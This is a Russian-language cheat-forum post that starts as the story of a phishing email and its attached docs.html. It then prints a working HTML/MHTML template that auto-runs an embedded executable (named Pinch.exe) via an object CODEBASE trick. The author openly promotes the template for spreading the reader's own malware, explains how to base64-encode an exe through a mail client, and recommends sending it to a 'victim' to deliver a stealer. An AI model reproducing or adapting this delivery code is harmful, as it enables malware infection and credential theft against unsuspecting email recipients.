Запуск Ехе-файла через Html страницу [Без софта] - Форум Cheat-Master.ru

Скидка на продавца и випа! Успей!
  • Страница 1 из 1
  • 1
Модератор форума: [CM]Russel  
Форум » Общение, флуд, оффтоп » Разное » Запуск Ехе-файла через Html страницу [Без софта] (Запуск Ехе-файла через Html страницу [Без софта])
Запуск Ехе-файла через Html страницу [Без софта]
Sargon™Дата: Суббота, 22.10.2016, 20:25 | Сообщение # 1
Новичок
Группа: Заблокированные
Сообщений: 3
Статус: Offline
Сидел я и ползал по просторам интернета и решил проверить свой почтовый ящик.
Там оказалось недавно пришедшее письмо странного содержания.
В начале втирали про что-то на русско-английском языке, а потом такая фраза: "Я слышал, что ты болеешь.
Выздоравливай скорее!". Примерно так. Что за чудо, я не болел уже давно.
К письму был прикреплен архив, защищенный паролем.
А пароль был в тексте письма: docs. В письме говорилось, что в архиве лежат пароли боссов.
Пароль к архиву подошел, и передо мной предстал ни в чем не повинный html файлик объемом всего в 15 килобайт.
Ну естественно запускать я его не стал, а нажал "F4" (в Total Commander'e).
Откылся Блокнот, с содержанием файла docs.html.

Код
MIME-Version: 1.0
Content-Location:file:///Pinch.exe
Content-Transfer-Encoding: base64
[BINARY TEXT VIRUS]
<title>Welcome - Home</title>
<body bgcolor=black scroll=no>
<script>
function malware()
{
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write( ' <title>Welcome - Home</title>
<body scroll=no bgcolor=black><FONT face="Comic Sans MS" color=red style="position:absolute;top:20;left:90;z-index:100; font-size:2cm;">
Sorry, Error On This Page! Please Open With Internet Explorer</center>
<object style="cursor:cross-hair" alt="Sorry, Error On This Page!
Please Open With Internet Explorer" classid="clsid:66666666-6666-6666-6666" CODEBASE="mhtml:'+path+'\\docs.html!file:///Pinch.exe">
</object>' <img src="/.s/sm/2/wink.gif" border="0" align="absmiddle" alt="wink" />
}
setTimeout("malware()",150)
</script>


Строка [BINARY TEXT VIRUS] означает, что на этом месте был закодирован exe файл вируса, вставлять я его не стал, уж слишком много места займет.
Перед вами макет автозапуска вируса из html файла.
Его можно использовать и для ваших творений.
Просто замените текст [BINARY TEXT VIRUS] на ваш код exe файла.
А код можно легко получить следующим образом...
Зайдите в почтовый клиент и нажмите "Написать новое сообщение", в открывшемся окне щелкните "Вставка" -> "Вложение файла".
Теперь "Файл" -> "Сохранить как...". После сохранения письма, его нужно открыть в Текстовом редакторе и вырезать тот самый код exe файла.
И все,отправляем жертве. Хороший способ для отправки стилера.
Последние товары с игрового магазина:
Найти еще что-нибудь в магазине:
Форум » Общение, флуд, оффтоп » Разное » Запуск Ехе-файла через Html страницу [Без софта] (Запуск Ехе-файла через Html страницу [Без софта])
  • Страница 1 из 1
  • 1
Поиск:
Статистика Форума
Последнии темы Читаемые темы Лучшие пользователи Новые пользователи
Продам личный STEAM аккау... [Di4aRrA]

►Набираю спамеров на кейс... [Keilen222]

Продажа валюты MTA CCD Pl... [stepanamz]

[stepanamz]

[Diamond-Rp] AutoBuy [Romka1337]

✅⛔ Продажа аккаунтов SVL,... [MoreMoney]

✅✅⛔ Продажа виртов SVL FL... [MoreMoney]

Aurora RP Помогите с бага... [gosh93]

Жалоба | Соник |... [XaXbIch]

1944558 rbоrn невалид. [АК_47]

1944561 rbоrn Невалид [АК_47]

[ALL] Акцент идиота. [redzhy]

[1]>[0.3z][RUS] S0beit modified by MishaN [10001]

[2]>Курилка [10000]

[3]>Поиск CLEO скриптов | Вопросы по клео скриптам [9988]

[4]>Флудильная [9936]

[5]>Курилка [9688]

[6]>Курилка [9614]

[7]>RakBot - Качай аккаунты не напрягаясь! [9603]

[8]>Общение читеров [CM] [9546]

[9]>S0beit - pr9n project for samp 0.3.7 [9490]

[10]>Часто задаваемые вопросы... [8225]

[11]>Скуплю Advance по 300р за 1кк и DIamond по 250р [7624]

[12]>[0.3.7][RUS] Sobeit modified by MishaN [6239]

[1]>АК_47 [31537]

[2]>GеNius [6975]

[3]>[CM]Russel [5524]

[4]>romka619 [5004]

[5]>[CM]AGRESSOR [4644]

[6]>Сэс [4405]

[7]>Snake_Firm [4351]

[8]>Artem_Buero [4186]

[9]>[CM]Durman [3125]

[10]>iMaddy [2859]

[11]>sky_Woker [2856]

[12]>[CM]Рафаэль [2757]

[13]>Sa1nteD [2678]

[14]>Ch0c0Cube [2446]

[15]>BY [2343]

aromanovich [19.06.2018|05:53]

iDrill [19.06.2018|05:36]

arsenkiy [19.06.2018|03:56]

Taxidermied-Owl [19.06.2018|02:36]

Arsen_sagatov [19.06.2018|01:31]

maxkost74 [19.06.2018|01:15]

zimmer9494 [19.06.2018|01:02]

kseon31 [19.06.2018|00:52]

Gradiuslll [19.06.2018|00:42]

GonwikHokage [19.06.2018|00:41]

balenciaga8008 [19.06.2018|00:33]

krtek555 [19.06.2018|00:30]

Jb[7762] [19.06.2018|00:10]

Lo0o0o0oney [18.06.2018|23:42]

Jasteron [18.06.2018|23:41]


CM Team © 2009-2018 Администрация не несёт ответственности за размещённые материалы. Условия пользования
Все материалы предоставлены в ознакомительных целях и администрация предлагает удалить их после ознакомления.

Положение о защите персональных данных на сайте, Пользовательское соглашение, Договор оказания услуг.